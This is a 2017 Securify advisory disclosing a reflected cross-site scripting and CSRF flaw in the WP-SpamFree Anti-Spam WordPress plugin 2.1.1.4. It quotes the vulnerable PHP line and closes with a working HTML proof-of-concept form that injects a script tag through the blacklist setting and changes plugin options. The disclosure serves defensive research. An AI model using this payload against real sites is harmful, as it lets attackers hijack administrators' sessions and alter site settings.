Security Bughunt

2017 - August - Amsterdam

2017 Target - IoT


#sumofpwn
Go to all WP advisories

Radjnies Bhansingh - Securify, March 2017

Cross-Site Scripting vulnerability in WP-SpamFree Anti-Spam WordPress Plugin

Abstract

A reflected Cross-Site Scripting vulnerability exists in the WP-SpamFree Anti-Spam WordPress plugin. This vulnerability allows an attacker to perform any action with the privileges of the target user. The affected code is not protected with an anti-Cross-Site Request Forgery token. Consequently, it can be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement).

Contact

For feedback or questions about this advisory mail us at sumofpwn at securify.nl

The Summer of Pwnage

This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.

OVE ID

OVE-20160712-0026

Tested versions

This issue was succesfully tested on the WP-SpamFree Anti-Spam WordPress Plugin version 2.1.1.4.

Fix

There is currently no fix available.

Introduction

A reflected Cross-Site Scripting vulnerability exists in the WP-SpamFree Anti-Spam WordPress plugin. This vulnerability allows an attacker to perform any action with the privileges of the target user. The affected code is not protected with an anti-Cross-Site Request Forgery token. Consequently, it can be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement).

Details

The vulnerability exists in the wp-spamfree.php file on line 6049:

$blacklist_keys_update = trim(stripslashes($_REQUEST['wordpress_comment_blacklist']));

In order to exploit this issue the target user must click a specially crafted link or visit a malicious website (or advertisement) and must be autenticated within WordPress.

In addition the WordPress specific blacklist can be cleared by using the request below and employing CSRF.      

Proof of concept

The following proof of concept code demonstrates this issue:

<html>

   <body>

      <form action="http://<target>/wp-admin/options-general.php?page=wp-spamfree%2Fwp-spamfree.php" method="POST">

         <input type="hidden" name="submitted_wpsf_general_options" value="1"/>

         <input type="hidden" name="use_alt_cookie_method" value="on"/>

         <input type="hidden" name="comment_logging_all" value="on"/>

         <input type="hidden" name="enhanced_comment_blacklist" value="on"/>

         <input type="hidden" name="wordpress_comment_blacklist" value="</textarea><script>alert(1)</script>foo&#13;&#10;bar&#13;&#10;press&#13;&#10;"/>

         <input type="hidden" name="allow_proxy_users" value="on"/>

         <input type="hidden" name="promote_plugin_link" value="on"/>

         <input type="hidden" name="submit_wpsf_general_options" value="Update&#32;Options&#32;�&#37;B"/>

         <input type="submit"/>

      </form>

   </body>

</html>